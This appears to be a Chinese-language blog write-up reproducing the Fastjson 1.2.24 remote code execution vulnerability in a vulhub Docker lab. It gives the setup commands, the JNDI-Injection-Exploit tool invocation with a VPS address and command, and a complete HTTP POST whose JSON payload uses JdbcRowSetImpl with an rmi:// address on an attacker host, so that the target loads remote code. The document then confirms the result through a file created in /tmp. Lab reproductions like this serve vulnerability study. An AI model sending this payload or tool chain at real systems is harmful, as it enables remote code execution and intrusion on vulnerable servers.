漏洞复现漏洞复现漏洞复现-fastjson
y2xsec漏洞复现-fastjson复现
1.2.24 RCE
漏洞:RCE
本次复现采用docker搭建。
1 2
| cd vulhub/fastjson/1.2.24-rce docker-compose up -d
|
打开 http://192.168.154.131:8090/
,发现有两个数据,具体不知道有什么用。
img
抓包看看
img
发包后发现回显是刚刚网页显示的,把数据复制下来利用post请求修改数据然后发包。
img
发现数据可以修改。
这里就需要涉及到一个知识点JNDI。
从github上找到了一个jndi利用工具:
1 2 3 4
| java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A [vpsip] -C [command]
|
img
构造数据包
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| POST / HTTP/1.1 Host: 靶机url User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/json Content-Length: 160
{ "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://vpsip:1099/9cf4ag", "autoCommit":true } }
|
发包
img
然后去目标机器上可以看到/tmp
目录下创建一个success
文件
img